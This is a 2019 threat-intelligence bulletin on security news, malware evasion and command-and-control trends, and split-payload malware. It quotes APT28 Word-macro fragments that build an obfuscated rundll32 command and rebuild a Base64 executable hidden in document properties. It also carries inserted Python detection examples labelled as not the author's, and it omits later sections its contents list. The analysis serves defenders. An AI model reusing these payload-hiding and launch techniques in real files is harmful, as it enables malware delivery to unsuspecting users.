
Volume 2, Issue 37

Classification: TLP Green


Effective: Tuesday 17th September, 2019
Version: 1.0

Author
TI Team
security-analysts@dcso.de
PGP Fingerprint: 2868 EF2B 34FB 0AD8 0C2D 45D2 ED20 E9B0 A0B2 C6A8

DCSO Deutsche Cyber-Sicherheitsorganisation GmbH


EUREF Campus 22, 10829 Berlin, Germany
Volume 2, Issue 37 TLP Green

Contents
1 Issues in Brief ...... 2
1.1 Mozilla Moves to Support DNS-over-HTTPS by Default in Firefox ...... 2
1.2 “Simjacker” SIM Card Vulnerability Actively Exploited to Spy on Mobile Users ...... 2
1.3 Emotet Malspam Resumes ...... 3
1.4 NSO Group’s UN Rights Abuses Guidelines Pledge Met with Skepticism ...... 4
2 From Malware to Aroundware: Emerging Obfuscation Trends in Malware Delivery and C2 Phases ...... 5
2.1 Endpoint Protection Evasion Techniques ...... 5
2.2 C2 Obscuration Techniques ...... 7
2.3 DCSO Conclusions and Recommendations ...... 8
3 March Separately, Strike Together: Splitting Malware to Evade Detection ...... 9
3.1 PlugX ...... 9
3.2 Microsoft OLE Storage ...... 9
3.3 Microsoft Word .docx ...... 11
3.4 DCSO Recommendations ...... 11
4 The IoT Threat Landscape Revisited ...... 13
4.1 The Rising Tide of IoT Device Attacks ...... 13
4.2 The Current Threat Landscape ...... 14
4.3 DCSO Conclusions and Recommendations ...... 17

Deutsche Cyber-Sicherheitsorganisation GmbH


Tuesday 17th September, 2019 TI Team 1

1 Issues in Brief
1.1 Mozilla Moves to Support DNS-over-HTTPS by Default in Firefox
Mozilla has announced that it plans to roll out DNS-over-HTTPS (DoH) by default within its
Firefox browser for a small group of U.S. users by the end of September,1 with Google
announcing days later that it plans to support optional DoH in its upcoming Chrome 78
browser.2 The principal rationale for the introduction of this protocol is privacy; it encrypts
both DNS requests and responses by obfuscating them within high-volume HTTPS traffic,
making them difficult to detect by internet service providers (ISPs), traffic filters, or any
other commercial or malicious third party that might attempt to intercept and sniff user
traffic.3 Additionally, it would allow customers to reroute to their own DoH-supported
servers and thereby limit the monetization opportunities ISPs derive from the capture of
DNS traffic data.4

Mozilla’s support of DoH by default in its browser has drawn criticism from various parties,
with points raised including the potential use of DoH by attackers in malware targeting, a
shift from highly distributed DNS resolvers to overreliance on a few large DoH providers,5
and, more specifically to enterprise, the potential circumvention of most content or security
controls following DoH introduction, which are often based on DNS.6 A comprehensive
analysis of the topic will be provided in the upcoming ad-hoc report “DNS-over-HTTPS
Support in Browsers: Enterprise Risks and Remediation.”

1.2 “Simjacker” SIM Card Vulnerability Actively Exploited to Spy on Mobile Users
Researchers at AdaptiveMobile Security have uncovered an actively exploited vulnerability in
mobile SIM cards that allows spying on users by sending them an SMS message.7 The
vulnerability, named “Simjacker,” abuses a flaw in the legacy software of the SIM Toolkit
technology on SIM cards by sending an SMS data message that allows the installation of

1 Catalin Cimpanu, “Mozilla to gradually enable DNS-over-HTTPS for Firefox US users later this month,” ZDNet, September 7, 2019, https://www.zdnet.com/article/mozilla-to-gradually-enable-dns-over-https-for-firefox-us-users-later-this-month/.
2 Tom Spring, “Google Announces DNS over HTTPS General Availability,” ThreatPost, June 26, 2019, https://threatpost.com/google-announces-dns-over-https-general-availability/146057/.
3 Selena Deckelmann, “DNS-over-HTTPS (DoH) Update-Detecting Managed Networks and User Choice,” Mozilla, July 31, 2019, https://blog.mozilla.org/futurereleases/2019/07/31/dns-over-https-doh-update-detecting-managed-networks-and-user-choice/.
4 John Dunn, “DNS over HTTPS is coming whether ISPs and governments like it or not,” Sophos, April 24, 2019, https://nakedsecurity.sophos.com/2019/04/24/dns-over-https-is-coming-whether-isps-and-governments-like-it-or-not/.
5 J. Livingood et al., “Centralized DNS over HTTPS (DoH) Implementation Issues and Risks,” IETF (Internet Draft), March 24, 2019, https://tools.ietf.org/id/draft-livingood-doh-implementation-risks-issues-03.html#rfc.section.8.
6 Catalin Cimpanu, “Mozilla: No plans to enable DNS-over-HTTPS by default in the UK,” ZDNet, July 6, 2019, https://www.zdnet.com/article/mozilla-no-plans-to-enable-dns-over-https-by-default-in-the-uk/.
7 Cathal McDaid, “Simjacker – Next Generation Spying Over Mobile,” Adaptive Mobile Security, September 12, 2019, https://www.adaptivemobile.com/blog/simjacker-next-generation-spying-over-mobile.


spyware without the user’s knowledge. This flaw allows remote attackers to retrieve
targeted devices' locations, send SMS messages on behalf of victims, spread malware by
forcing phone browsers to open malicious pages, and spy on victims’ surroundings.
Additionally, as it targets the SIM cards, the attack is successful independently of handset
types and their respective OS. Researchers believe that this vulnerability has been exploited
for at least the last two years and are “quite confident” that this exploit was developed by a
specific private company that works with governments to monitor individuals.

A series of debates on Twitter8 concerning “the uncovering of the exploit” has drawn
attention to the fact that German researcher Karsten Nohl may have first uncovered the
vulnerability in 2013,9 while others have cited the work of security researcher Bogdan Alecu
from 2011.10

1.3 Emotet Malspam Resumes


Following an extended period of inactivity over the summer, multiple reports indicate that
Emotet malspam has resumed, following reports last month that the botnet’s C2
infrastructure had returned online.11 Researchers found that the malicious emails had been
sent from 3,362 different hijacked senders, targeting more than 65,000 unique email
addresses, with lure email templates found in multiple languages including English, German,
Polish, and Italian.12

Lure templates across multiple languages appear to broadly follow a similar pattern, typically
providing false invoices or documentation (often financial) either requesting that the
recipient check the message or otherwise claiming that a problem has occurred to entice
victims to open the attachment.13 Other researchers have identified additional elements of
the current campaign that are in line with previous Emotet outbreaks, including ESET

8 Daniel Cuthbert (@dcuthbert), “When an attack by Karsten Nohl from 6 years ago,” Twitter, September 12, 2019, https://twitter.com/dcuthbert/status/1172138454865645568.
9 Bill Ray, “How I hacked SIM cards with a single text - and the networks DON'T CARE,” The Register, September 23, 2013, https://www.theregister.co.uk/2013/09/23/white_hat_sim_hacker_disillusioned_and_dismayed_by_operator_response/.
10 Lucian Constantin, “Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages,” PCWorld, December 19, 2011, https://www.pcworld.com/article/246528/remote_sms_attack_can_force_mobile_phones_to_send_premium_rate_text_messages.html.
11 CERT-Bund (@certbund), “#Emotet ist zurück!” Twitter, August 23, 2019, https://twitter.com/certbund/status/1164803474497761286.
12 Ionut Ilascu, “Emotet Revived with Large Spam Campaigns Around the World,” Bleeping Computer, September 16, 2019, https://www.bleepingcomputer.com/news/security/emotet-revived-with-large-spam-campaigns-around-the-world/.
13 Ibid.


confirming that they have observed the current Emotet wave distributing TrickBot.14 IOC lists
have also been published by a number of researchers and vendors.15

1.4 NSO Group’s UN Rights Abuses Guidelines Pledge Met with Skepticism
Israeli-based NSO Group, a supplier of surveillance tools to governments and law
enforcement, announced last week that it would abide by U.N. guidelines to prevent rights
abuses after months of mounting criticism due to the use of their Pegasus software for
political surveillance of activists in Mexico, the United Arab Emirates, and Saudi Arabia.16
NSO Group also plans to evaluate its sales process and contractually oblige customers to
limit the use of its products to the prevention of serious crimes, and to ensure that the
products will not be used to violate human rights. NSO Group, however, declined to provide
details of previous acquisitions of their software, citing significant constraints on lawful
disclosure under the Israeli export license regime, and providing, in a previously published
letter, an independent legal opinion from the Israeli law firm Herzog, Fox & Neeman
confirming this.17

Human rights activists have countered that preventing human rights abuses requires both
transparency and independent oversight over the NSO Group, and both are absent from its
human rights policy.18 Transparency is next to impossible with the presence of significant
constraints on public disclosure, and the independent legal opinion provided was prepared
by Herzog Fox Neeman’s partner Daniel Reisner, who represents many Israeli cyber firms
and additionally a member of the ethics committee at NSO Group, potentially raising conflict
of interest concerns.19

14 ESET research (@ESETresearch), “#ESETresearch can confirm: #Emotet is back,” Twitter, September 17, 2019, https://twitter.com/ESETresearch/status/1173932076258734081.
15 Threat Intelligence Team, “Emotet is back: botnet springs back to life with new spam campaign,” Malwarebytes Labs, September 16, 2019, https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/.
16 Steven Scheer, “Cyber firm NSO vows to tackle human rights misuse,” Reuters, September 10, 2019, https://uk.reuters.com/article/us-cyber-rights-nso-idUKKCN1VV11S.
17 Novalpina Capital, “Response to Open Letter to Novalpina Capital on 15 April 2019,” Citizen Lab, May 15, 2019, https://citizenlab.ca/wp-content/uploads/2019/05/Novalpina-reply-May-15.pdf.
18 Siena Anstis (@sienaanstis), “1/8 Transparency and independent oversight of NSO Group,” Twitter, September 10, 2019, https://twitter.com/sienaanstis/status/1171427825804443649?s=21.
19 Siena Anstis (@sienaanstis), “5/8 Novalpina conveniently failed to mention that the ‘independent’ opinion,” Twitter, September 10, 2019, https://twitter.com/sienaanstis/status/1171427831894528002.


2 From Malware to Aroundware: Emerging Obfuscation Trends in Malware Delivery and C2 Phases
The malware threat posed to corporations has advanced in sophistication in recent years.
Although enterprise and end-user security solutions have also become more comprehensive
in response to mounting cybercriminal pressure, today’s malware developers have
demonstrated a willingness to innovate in unanticipated ways to circumvent advanced
malware detection methods.

The struggle to secure the modern cyber threat landscape revolves around finding scalable
responses to cybercriminals’ ingenuity. Adopting an anticipative mindset to stay one step
ahead of your adversaries requires a keen awareness of emerging defense circumvention
techniques. This article provides an account of some of the more surprising malware
obfuscation trends observed at the delivery and command and control phases of recent
malware campaigns.

2.1 Endpoint Protection Evasion Techniques


Leveraging File-Type Obscurity

Recent attack instances have exploited under-scrutinized file types to bypass antivirus and
secure email gateways. AV products have many signature-based methods to inspect
common malware file types such as VBA, but most obscure formats do not receive the same
level of scrutiny. A sophisticated malware campaign carried out by the North Korean
Kimsuky APT group this summer embedded a malicious Visual Basic Script (.vba) within a
more obscure Kodak FlashPix file format (.fpx) to significantly lower the rate at which the
malware was successfully detected by AV products. Prevailion researchers found that by
doing so, the attackers lowered the malware’s successful initial detection rate to 8/57 AV
products from the VBA’s initial detection rate of 23/57.20

Recent findings from cybersecurity researchers have also shown the risk posed by malicious
virtual disk email attachments.21 While email providers such as Gmail block emails
containing certain executable file types,22 many cloud solutions cannot mount VHD
containers, leaving their malicious contents free to bypass email filtering systems. Security
researcher Jan Poulsen found that, by combining VHD containers with a script exploiting the
Windows “diskpart” command-line utility, an attacker could automatically mount and
execute the malware inside, undetected, once downloaded.23

20 Danny Adamitis and Elizabeth Wharton, “Autumn Aperture Report,” Prevailion Blog, September 11, 2019, http://blog.prevailion.com/2019/09/autumn-aperture-report.html.
21 Ionut Ilascu, “Virtual Disk Attachments Can Bypass Gmail and Chrome Security,” BleepingComputer, September 11, 2019, https://www.bleepingcomputer.com/news/security/virtual-disk-attachments-can-bypass-gmail-and-chrome-security/.
22 Google, “File Types Blocked in Gmail,” Gmail Help, accessed September 16, 2019, https://support.google.com/mail/answer/6590?hl=en.
23 Ibid.


Exploiting Trusted Domains

Malware strains also increasingly host their components on trusted domains in order to
bypass secure email gateway protocols. Cofense researchers recently investigated malware
developers’ usage of trusted file hosting services such as SharePoint24 and Google Drive25 to
covertly deliver malicious payloads to their targets. By using legitimate services as initial
delivery mechanisms for secondary malicious URLs or files, threat actors can easily bypass
email-based detection techniques.

A Cofense report released this month also uncovered a credential-stealing email campaign
that directed users to an intermediary Azure Web Sites page hosting only a Captcha code,
leaving the SEG to mark it as safe.26 Upon solving the Captcha, the user is redirected to a
spoofed Microsoft login portal hosted on the company’s official infrastructure. While this
case does not feature an active malware component, it demonstrates how other trusted
online tools can also be incorporated into social engineering strategies to improve an
attacker’s chance of operational success.

“Zombie Phishing”

Zombie phishing refers to the practice of hijacking email accounts to send malware as a
response to an existing email thread.27 Because the response is part of a legitimate
conversation chain, the victim might be less likely to realize they’ve been targeted.
Furthermore, recent attack instances appear to use webmail-related words within
automatically generated infection URLs, further reducing the likelihood for SEGs to block the
malicious emails in question. With the resurging Emotet botnet employing similar means to
spread its malware,28 this unorthodox infection method should not be underestimated.

Fraudulent-But-Legitimate Digital Certificates

A recent investigation by cybersecurity firm ReversingLabs uncovered an instance in which a
cybercriminal impersonated a legitimate entity to purchase a legitimate digital certificate,
which was subsequently used to spread malware via signed malicious files.29 Cybercriminals

24 Milo Salvia, “Phishing Emails Are Using SharePoint to Slip Past Symantec’s Gateway and Attack Banks,” Cofense (blog), September 3, 2019, https://cofense.com/phishing-emails-using-sharepoint-slip-past-symantecs-gateway-attack-banks/.
25 Tej Tulachan, “Trickbot Is Using Google Docs to Trick Proofpoint’s Gateway,” Cofense (blog), August 29, 2019, https://cofense.com/trickbot-using-google-docs-trick-proofpoints-gateway/.
26 Fabio Rodrigues, “New Phishing Campaign Uses Captcha to Bypass Email Gateway,” Cofense (blog), September 9, 2019, https://cofense.com/new-phishing-campaign-uses-captcha-bypass-email-gateway/.
27 Erika Mendoza, Anjali Patil, and Jay Yaneza, “Phishing Campaign Uses Hijacked Emails to Deliver URSNIF by Replying to Ongoing Threads,” TrendLabs Security Intelligence (blog), October 9, 2018, https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/.
28 Marcus Hutchins (@MalwareTechBlog), “Emotet Is Back Spamming after Months of Inactivity. Currently They’re Using Stolen Emails to Reply to Existing Email Threads with Malspam (Targeting DE),” Twitter, September 16, 2019, https://twitter.com/malwaretechblog/status/1173517787597172741.
29 Tomislav Pericin, “Digital Certificates - Models for Trust and Targets for Misuse,” ReversingLabs (blog), September 16, 2019, https://blog.reversinglabs.com/blog/digital-certificates-impersonated-executives-as-certificate-identity-fronts.


can attach a fraudulent scanning record to the certificate with relative ease, giving
their digital certificates a clean record before selling them on the black market to other
malware developers.

ReversingLabs found that one observed actor was issued an extended validation certificate,
which allows associated apps to “bypass Microsoft SmartScreen protection and allow signed
programs to execute with no warnings about the possible unsafe file origins.”30 Code-signing
certificates have come under greater scrutiny due to their increasing abuse in malware
campaigns,31 but nevertheless cannot be discounted entirely due to the pivotal role they play in
trust-based software environments.

2.2 C2 Obscuration Techniques


DNS-over-HTTPS Services Exploitation

The Godlua malware discovered last July was “the first-ever malware strain seen using DNS-
over-HTTPS (DoH) to hide its DNS traffic,”32 effectively negating cybersecurity products that
rely on passive DNS monitoring. A recent, updated version of the .NET-based malware
PsiXBot uses Google’s new DoH service to resolve its C2 IP addresses, leaving SSL/TLS
interception (MITM) of the DoH queries as the only effective way to detect the malware’s
communications.33 As companies increasingly offer accessible DoH services to encrypt user
traffic, it is likely that this trend will become more prevalent in the near future.

Trusted Domains

Malware developers are also increasingly exploiting legitimate cloud service providers for
their C2 processes. The RogueRobin malware favored by the DarkHydrus APT group employs
a custom C2 channel exploiting Google Drive,34 using an API from the service to get job
commands.

Social media websites are also a relevant vector here, with the Russian Turla APT group
infamously using American pop singer Britney Spears’ Instagram posts to house encoded C2
server URLs in 2017.35 A new version of the Astaroth Trojan active in Brazil retrieves C2
configuration data from “within posts on Facebook or within the profile information of user

30 Ibid.
31 ENISA, “Valid Digital Certificates Code Signing Malware,” European Union Agency for Cybersecurity (blog), June 30, 2018, https://www.enisa.europa.eu/publications/info-notes/valid-digital-certificates-code-signing-malware.
32 Catalin Cimpanu, “First-Ever Malware Strain Spotted Abusing New DoH (DNS over HTTPS) Protocol,” ZDNet, July 3, 2019, https://www.zdnet.com/article/first-ever-malware-strain-spotted-abusing-new-doh-dns-over-https-protocol/.
33 Proofpoint Threat Insight Team, “PsiXBot Now Using Google DNS over HTTPS and Possible New Sexploitation Module,” Proofpoint (blog), September 6, 2019, https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module.
34 Tara Seals, “RogueRobin Malware Uses Google Drive as C2 Channel,” Threatpost, January 23, 2019, https://threatpost.com/roguerobin-google-drive-c2/141079/.
35 Catalin Cimpanu, “Russian State Hackers Use Britney Spears Instagram Posts to Control Malware,” BleepingComputer, June 6, 2017, https://www.bleepingcomputer.com/news/security/russian-state-hackers-use-britney-spears-instagram-posts-to-control-malware/.


accounts on YouTube,” allowing threat actors to bypass defenses that rely on URL-based
content filtering.36 This campaign also uses HTTPS POST to send its two-layered encrypted
information, bypassing further network security measures that cannot decrypt it.

2.3 DCSO Conclusions and Recommendations


Enterprise cybersecurity can be understood as a contest with minimal margins for error, on
terms that favor attackers considerably. The conflict between cybercriminals and
cybersecurity professionals would look different in an ideal world where security operated in a
vacuum, but in practice the majority of decisions that affect enterprise security are
made by uninitiated users. In spite of this fundamental complicating factor, best practices
have to maintain a balance between securing systems and preserving their general
operability. There is no comprehensive solution to the cybercriminal threat other
than continual anticipation and evolution, and whole-of-business observance of basic
cyber hygiene practices.

Trends such as the rise of polymorphic malware have already necessitated the incorporation
of new threat detection techniques in everyday cybersecurity tools and solutions, and the
global uptick in aggressive cybercrime37 further illustrates the need for cybersecurity
professionals to anticipate, and maintain awareness of, unorthodox malware techniques on
the horizon to protect high-value targets. Although the instances investigated in this article
remain relatively obscure, they indicate potential development pathways for future malware
techniques. Understanding the unanticipated means employed by contemporary malware
campaigns to circumvent security perimeters and communicate with remote servers
undetected is one piece of a larger puzzle to improve the state of security in the private
sector.

DCSO recommendations are as follows:

• Implement and enable multifactor authentication across your organisation.
• Train users to pay special attention to scenarios where they are asked to log in and
  supply credentials.
• Continually verify and audit trusted enterprise software.

36 Aaron Riley, “Astaroth Uses Facebook and YouTube within Infection Chain,” Cofense (blog), September 11, 2019, https://cofense.com/astaroth-uses-facebook-youtube-within-infection-chain/.
37 European Union Agency for Law Enforcement Cooperation, “Europol Crime Areas: Cybercrime,” Europol (blog), 2018, https://www.europol.europa.eu/crime-areas-and-trends/crime-areas/cybercrime.


3 March Separately, Strike Together: Splitting Malware to Evade Detection
In the never-ending arms race with the anti-virus industry, malware authors have invented a
multitude of techniques to evade detection. One of these techniques is splitting a large,
monolithic malware into two or more innocent looking pieces. This article illustrates this
technique with a few examples from APT attacks and discusses countermeasures.

3.1 PlugX
The most prominent example of the “march separately, strike together” paradigm is the
well-known PlugX triad. For a long time, PlugX malware has been shipped in three parts:

1. A benign program
2. A small loader DLL
3. The encrypted PlugX payload

Here is a typical example: The benign program belongs to Kaspersky Anti-Virus software.
Sample 902d771612edecc03757b289a6fe94cd18f2c88c0fc64f93f8ac449502e4ec52, known
as kav.exe, presents a valid digital signature. However, the trusted code loads a DLL named
ushata.dll in an insecure manner. The attacker exploits this vulnerability by providing their
own version of this file. Their loader DLL
(43047367c47e2ad3fc46a565530b991fba1baeccb0937fd846a4042c9dcc1db4) is only about
three kilobytes in size. Static analysis does not reveal much. The DLL allocates some memory,
loads the third file, and transfers control. The third file appears as a data file with an entropy
of 7.6 bits per byte
(2089591b41ca46802d2699075ca56b183a27b3a7080dbc9d42993357c0845efd).

So, all three files either are or appear to be unsuspicious. By exploiting a vulnerability in
trusted code and splitting the payload, the attacker very likely could evade static detection
methods.

The most promising strategy to detect the malware is behavioral analysis. Most notably, the
loading and executing of untrusted data from a trusted executable should trigger an alarm.
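As an added example (not DCSO's code and not derived from the samples above), the following Python computes the bits-per-byte entropy figure quoted for the third file and applies a simple triage heuristic for the triad pattern to a directory listing: an executable, a small DLL beside it, and a non-executable file whose entropy is high enough to look encrypted. The file names reuse those from the text, but the contents are constructed stand-ins; the 7.0-bit threshold and the 8 KB DLL limit are assumptions. Entropy is only a triage signal, which is why the text points to behavioral detection as the most promising strategy.

```python
import math
import random
from collections import Counter
from typing import Dict, List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte: 0.0 for empty or
    constant input, 8.0 for a perfectly uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_pe(blob: bytes) -> bool:
    """Cheap PE check on the DOS header magic; enough for this triage heuristic."""
    return blob[:2] == b"MZ"


def find_sideload_triads(files: Dict[str, bytes],
                         entropy_threshold: float = 7.0,
                         small_dll_limit: int = 8192) -> List[Tuple[str, str, str]]:
    """Flag the PlugX-style triad in one directory listing (name -> content):
    an executable, a small DLL next to it, and a non-executable file whose
    entropy is near the 8-bit ceiling. Each hit is (exe, dll, blob).
    Threshold and size limit are assumptions, not vendor-published values."""
    exes = [n for n, b in files.items() if n.lower().endswith(".exe") and is_pe(b)]
    small_dlls = [n for n, b in files.items()
                  if n.lower().endswith(".dll") and is_pe(b) and len(b) <= small_dll_limit]
    blobs = [n for n, b in files.items()
             if not is_pe(b) and shannon_entropy(b) >= entropy_threshold]
    return [(e, d, b) for e in exes for d in small_dlls for b in blobs]


# Constructed sample directory (not real samples): a stand-in for the signed host
# executable, a ~3 KB loader DLL and a 64 KB blob of seeded pseudo-random bytes
# whose entropy sits near 8 bits/byte, like the 7.6 bits/byte payload described above.
_rng = random.Random(1)
SUSPICIOUS_DIR = {
    "kav.exe": b"MZ" + b"\x00" * 40000,
    "ushata.dll": b"MZ" + bytes(_rng.getrandbits(8) for _ in range(3000)),
    "kav.dat": b"\x00" + bytes(_rng.getrandbits(8) for _ in range(65535)),
}

# Constructed benign directory: an executable with only a text file next to it.
BENIGN_DIR = {
    "app.exe": b"MZ" + b"\x00" * 40000,
    "readme.txt": b"This program prints a report.\n" * 200,
}

if __name__ == "__main__":
    for name, content in SUSPICIOUS_DIR.items():
        print(f"{name:12s} {len(content):6d} bytes  entropy {shannon_entropy(content):.2f} bits/byte")
    print("suspicious triads:", find_sideload_triads(SUSPICIOUS_DIR))
    print("benign triads:", find_sideload_triads(BENIGN_DIR))
```

Run against a real directory, the same function would take `{name: open(path, "rb").read()}`; a hit means "worth a closer look", not "malicious", since installers and game assets also ship high-entropy data next to small DLLs.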

3.2 Microsoft OLE Storage


The same principle can also be applied to data containers that provide an inner structure. A
very common container format is Microsoft’s structured OLE storage that has been used for
software deployment (.msi) and the old-fashioned Microsoft Office documents (.doc, .xls).

The associated application (e.g., Microsoft Word) assumes the role of a trusted execution
environment. The attackers frequently rely on Word’s capability to execute VBA macros.
Theoretically, it should be possible to limit execution of macros to digitally signed and
therefore trusted code. But in an open, fast-paced, and business-friendly environment, code-
signing becomes a hindrance. The application’s user becomes the last line of defense and is
required to exercise common sense whenever a macro warning pops up.


Sample efb235776851502672dba5ef45d96cc65cb9ebba1b49949393a6a85b9c822f52 is a
Word document that was crafted by APT28. The macro is very short; the first half of the
code is a harmless Base64 decoding function. The only suspicious action is the slightly
obfuscated construction of a command line for later execution.

    cmdLine = "C:\" + "###" + "Win" + "###" + "dow" + "###" + "s\Sy" + "###" + "ste" + "###" + "m32\" + _
              "run" + "###" + "dll" + "32" + "#" + ".exe " + """" + Path + """" + "###" + ",KlpSvc"

    'stripping the "#" padding yields: C:\Windows\System32\rundll32.exe "<Path>",KlpSvc
    WordBasic.[Shell] Replace(cmdLine, "#", "")

There might be legitimate reasons to launch a helper application (e.g., a database or
calculator) from the Word document. The malicious payload, however, will be constructed at
runtime from fragments that are stored in various locations within the container’s structure:

    'extract and decode encoded file
    'the first 50 characters of each property are discarded; the remainder is a Base64 fragment
    Subject = ActiveDocument.BuiltInDocumentProperties.Item("Subject")
    Subject = Right(Subject, Len(Subject) - 50)
    Company = ActiveDocument.BuiltInDocumentProperties.Item("Company")
    Company = Right(Company, Len(Company) - 50)
    Category = ActiveDocument.BuiltInDocumentProperties.Item("Category")
    Category = Right(Category, Len(Category) - 50)
    Hyperlink_base = ActiveDocument.BuiltInDocumentProperties.Item("Hyperlink base")
    Hyperlink_base = Right(Hyperlink_base, Len(Hyperlink_base) - 50)
    Comments = ActiveDocument.BuiltInDocumentProperties.Item("Comments")
    Comments = Right(Comments, Len(Comments) - 50)
    'the fragments only form a valid executable once concatenated in this order
    base64 = Subject + Company + Category + Hyperlink_base + Comments
    bin = DecodeBase64(base64)

The view of a static analyzer may be restricted to the macro only; the contents of the various
properties will not be available for analysis. By splitting the payload, the attackers very likely
succeeded in bypassing security measures.

It should be noted that, in this particular case, detection by a signature would have been
very easy: The Base64 encoded executable header TVqQ is clearly visible in the file. When
needed, attackers could easily thwart detection by using a non-standard base64 alphabet or
even the simplest form of encryption.


3.3 Microsoft Word .docx


Years ago, Microsoft Office switched from complex OLE storage to ZIP archives as its
container format. In terms of signature-based detection, the compression layer obfuscates the true
contents of the file. In sample
a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797, APT28 used this
to their advantage.

The sample is a .docx Microsoft Word document. It shares the Base64 decoder function and
some comments with the sample discussed earlier. Again, the payload has been hidden in
document properties, which are stored in the docProps/app.xml stream of the container.
Microsoft Word now uses XML as its underlying format, so the attackers can conveniently
retrieve their payload with an XPath query:

    'extract and decode encoded file
    xml = ActiveDocument.WordOpenXML
    Set xmlParser = CreateObject("Msxml2.DOMDocument")
    If Not xmlParser.LoadXML(xml) Then
        Exit Sub
    End If
    Set currNode = xmlParser.DocumentElement
    'every lpwstr under the HLinks property vector; the second node (index 1) carries the payload
    Set selected = currNode.SelectNodes("//HLinks" & "/vt:" & "vector" & "/vt:" & "variant" & "/vt:" & _
        "lpwstr")
    If 2 > selected.Length Then
        Exit Sub
    End If
    base64 = selected(1).Text
    bin = DecodeBase64(base64)

Common static scanners would unpack the ZIP archive and scan each stream separately. The
scanner would likely flag each of the components as suspicious, but could easily miss the
true maliciousness of the combined action.
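To show what scanning the combined action means for both samples above (the .doc whose payload is spread over five document properties, and the .docx whose payload sits under HLinks in docProps/app.xml), here is an added Python example that is not DCSO's code. It reassembles split fragments the way the first macro does, walks a .docx package's app.xml along the same node path the second macro's XPath query selects, and Base64-decodes each candidate only far enough to check for a PE header. The package and the payload are constructed stand-ins (a DOS header magic plus filler bytes); the 50-character cover prefix and the 20-character slicing are assumptions chosen to mirror the macro, and the hyperlink string is a placeholder.

```python
import base64
import binascii
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional

# Namespaces used by docProps/app.xml in Office Open XML packages.
EP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
VT_NS = "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"
B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MZ_B64_SIGNATURE = "TVqQ"  # Base64 of the DOS header bytes "MZ\x90", the signature named above


def decode_if_pe(fragment: str) -> Optional[bytes]:
    """Base64-decode a string and return the bytes only when they start with MZ."""
    s = fragment.strip()
    if len(s) < 4 or not B64_CHARS.match(s):
        return None
    if "=" not in s:                      # tolerate fragments stored without padding
        s += "=" * (-len(s) % 4)
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw if raw[:2] == b"MZ" else None


def reassemble_split_payload(properties: List[str], prefix_len: int = 50) -> Optional[bytes]:
    """Mirror the .doc macro: drop prefix_len characters from every property value,
    concatenate the remainders in order, decode, and check for an MZ header."""
    return decode_if_pe("".join(p[prefix_len:] for p in properties))


def hlink_strings(docx_bytes: bytes) -> List[str]:
    """Every vt:lpwstr under HLinks in docProps/app.xml, in document order: the
    same node set the .docx macro's XPath query selects."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "docProps/app.xml" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("docProps/app.xml"))
    path = f"{{{EP_NS}}}HLinks/{{{VT_NS}}}vector/{{{VT_NS}}}variant/{{{VT_NS}}}lpwstr"
    return [(el.text or "") for el in root.iterfind(path)]


def scan_docx(docx_bytes: bytes) -> List[int]:
    """Indexes of HLinks strings that decode to an executable; a scanner that only
    looks at word/document.xml or the macro stream never sees them."""
    return [i for i, s in enumerate(hlink_strings(docx_bytes)) if decode_if_pe(s) is not None]


def build_sample_docx(lpwstr_values: List[str]) -> bytes:
    """Constructed minimal .docx-like package (not a real sample) whose app.xml
    carries the given strings inside HLinks."""
    variants = "".join(f"<vt:variant><vt:lpwstr>{v}</vt:lpwstr></vt:variant>" for v in lpwstr_values)
    app_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Properties xmlns="{EP_NS}" xmlns:vt="{VT_NS}">'
        "<Application>Microsoft Office Word</Application>"
        f'<HLinks><vt:vector size="{len(lpwstr_values)}" baseType="variant">{variants}</vt:vector></HLinks>'
        "</Properties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", "<document/>")  # placeholder body, not parsed here
        zf.writestr("docProps/app.xml", app_xml)
    return buf.getvalue()


# Constructed stand-in for an executable: the DOS header magic plus filler bytes.
FAKE_PE = b"MZ\x90\x00" + bytes(range(64))
PAYLOAD_B64 = base64.b64encode(FAKE_PE).decode()

# The .doc variant: five property values, each 50 characters of cover text
# (assumed; the macro only tells us the length) followed by one slice of the payload.
COVER = "ReviewCopy" * 5
SPLIT_PROPERTIES = [COVER + PAYLOAD_B64[i:i + 20] for i in range(0, len(PAYLOAD_B64), 20)]

# The .docx variant: the second lpwstr under HLinks carries the whole payload.
SAMPLE_DOCX = build_sample_docx(["https://example.invalid/template.dotx", PAYLOAD_B64])

if __name__ == "__main__":
    print("fragments that decode to a PE on their own:",
          [i for i, p in enumerate(SPLIT_PROPERTIES) if decode_if_pe(p)])
    print("TVqQ signature visible in a raw fragment:",
          any(MZ_B64_SIGNATURE in p for p in SPLIT_PROPERTIES))
    print("reassembled .doc payload is a PE:", reassemble_split_payload(SPLIT_PROPERTIES) == FAKE_PE)
    print("HLinks strings in .docx that decode to a PE:", scan_docx(SAMPLE_DOCX))
```

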